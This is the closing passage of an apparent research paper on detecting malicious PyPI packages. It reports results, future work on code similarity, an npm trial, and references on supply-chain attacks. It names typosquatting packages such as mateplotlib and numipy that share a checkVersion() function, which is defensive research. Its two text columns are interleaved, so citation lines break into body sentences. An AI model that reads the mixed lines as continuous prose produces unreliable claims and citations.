and combine it with multiple reverse cross-validation and [10] M. Taylor, R. K. Vaidya, D. Davidson, L. De Carli, and V. Rastogi,
de-duplication to ensure the validity of the results. From “Spellbound: Defending against package typosquatting,” arXiv preprint
arXiv:2003.03471, 2020.
228,723 pip packages, we get 5,699 packages awaiting manual [11] M. Ohm, A. Sykosch, and M. Meier, “Towards detection of software
review. After reviewing, we find 301 undisclosed suspicious supply chain attacks by forensic artifacts,” in Proceedings of the 15th
or malicious packages. For the managers of PyPI ecosystem, it International Conference on Availability, Reliability and Security, 2020,
pp. 1–6.
makes sense that if the task is to evaluate the entire community, [12] D. L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Towards
our approach will reduce the workload by 97.51%. using source code repositories to identify software supply chain attacks,”
in Proceedings of the 2020 ACM SIGSAC Conference on Computer and
B. Future Work Communications Security, 2020, pp. 2093–2095.
[13] K. Garrett, G. Ferreira, L. Jia, J. Sunshine, and C. Kästner, “Detecting
When dealing the malicious packages with fewer features, suspicious package updates,” in 2019 IEEE/ACM 41st International
our approach performs poorly, which might be caused by the Conference on Software Engineering: New Ideas and Emerging Results
fact that we are using an anomaly detection mindset. Our (ICSE-NIER). IEEE, 2019, pp. 13–16.
[14] O. Foundation and other contributors, “Postmortem for malicious
approach is based on the assumption that malicious/anomaly packages published on july 12th, 2018,” Retrieved from:
packages are similar but different from benign/normal pack- https://eslint.org/blog/2018/07/postmortem-for-malicious-package-
ages. However, it is obvious that the majority of malicious publishes, 2018.
[15] H. Denbraver, “Malicious packages found to be typo-squatting in
packages are functionally complex, so those with fewer func- python package index,” Retrieved from: https://snyk.io/blog/malicious-
tions are difficult for us to detect. In our future work, we intend packages-found-to-be-typo-squatting-in-pypi, 2019.
to tackle the above problem from the dimension of code sim- [16] A. Bannister, “Dependency confusion attack mounted via pypi
repo exposes flawed package installer behavior,” Retrieved from:
ilarity. During our experiments, we found that the malicious https://portswigger.net/daily-swig/dependency-confusion-attack-
code parts in most malicious packages are similar, for example, mounted-via-pypi-repo-exposes-flawed-package-installer-behavior,
libcurl, libhtml5, mateplotlib, numipy, etc. packages all contain 2021.
[17] M. Ohm, H. Plate, A. Sykosch, and M. Meier, “Backstabber’s knife
the function checkVersion(). collection: A review of open source software supply chain attacks,” in
At the same time, we notice that such poisoning against International Conference on Detection of Intrusions and Malware, and
package registries is also serious in Npm and RubyGems [2]. Vulnerability Assessment. Springer, 2020, pp. 23–43.
[18] F. T. Liu, K. M. Ting, and Z.-H. Zhou, “Isolation forest,” in 2008 eighth
We have done a preliminary evaluation of the npm ecosystem ieee international conference on data mining. IEEE, 2008, pp. 413–422.
while improving the PPD. After randomly selecting 300,000 [19] Z. Zou, Y. Xie, K. Huang, G. Xu, D. Feng, and D. Long, “A docker
packages, we found 16 suspicious or malicious npm packages. container anomaly monitoring system based on optimized isolation
forest,” IEEE Transactions on Cloud Computing, 2019.
One of which, named monent, has been removed. We will [20] S. Ahmed, Y. Lee, S.-H. Hyun, and I. Koo, “Unsupervised machine
continue to adapt our methodology to better detect malicious learning-based detection of covert data integrity assault in smart grid
packages lurking in Npm and RubyGems. networks utilizing isolation forest,” IEEE Transactions on Information
Forensics and Security, vol. 14, no. 10, pp. 2765–2777, 2019.
ACKNOWLEDGMENT [21] E. Zhong, W. Fan, Q. Yang, O. Verscheure, and J. Ren, “Cross validation
framework to choose amongst models and datasets for transfer learning,”
This research is funded by the National Natural Science in Joint European Conference on Machine Learning and Knowledge
Foundation of China (No.61902265), Sichuan Science and Discovery in Databases. Springer, 2010, pp. 547–562.
Technology Program (No.2020YFG0047, No.2020YFG0374).

613

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.

You might also like